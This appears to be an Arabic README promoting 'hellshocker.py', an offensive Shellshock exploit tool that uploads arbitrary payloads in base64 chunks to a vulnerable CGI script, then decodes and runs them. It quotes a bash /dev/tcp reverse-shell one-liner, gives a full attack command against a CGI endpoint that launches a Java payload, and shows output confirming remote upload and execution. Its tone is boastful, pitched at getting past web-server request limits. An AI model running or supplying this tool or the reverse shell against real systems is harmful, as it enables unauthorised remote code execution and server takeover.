
سكريبت استغلال ثغرة Shellshock قادر على الرفع وتنفيذ الأوامر عن بُعد (RCE) باستخدام أي ناقل بفضل تعدد استخداماته.
هل سئمت من استخدام استغلالات ضعيفة لثغرة shellshock أو مجرد استخدام "/bin/bash >& /dev/tcp/IP/port 0>&1" للوصول إلى الخادم؟
نعم، تحتاج إلى رفع وتنفيذ شيء أكثر تعقيدًا على الخادم، وترميز ملف ضخم بقاعدة 64 (base64) أمر مستحيل لأن طلب HTTP الخاص بك لن يُقبل من قبل خادم الويب.
قد تنتهي مشاكلك مع هذه الأداة. فهي قادرة على ترميز الحمولة (payload) الخاصة بك إلى base64 وإرسالها على شكل أجزاء (بشكل افتراضي 128 بايت) إلى خادم الويب، ثم بعد إرسالها، تقوم بفك الترميز وتنفيذها.
"واو"، تقول، "لكن ليس لدي PHP، أحتاج شيئًا لجافا." لا مشكلة، أقول، هذه الأداة قابلة للتخصيص بدرجة كبيرة.
فقط انظر إلى هذا:
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.
ثم تم نقل حمولتك بنجاح وتنفيذها. أليس هذا رائعًا؟ أجل، إنه كذلك.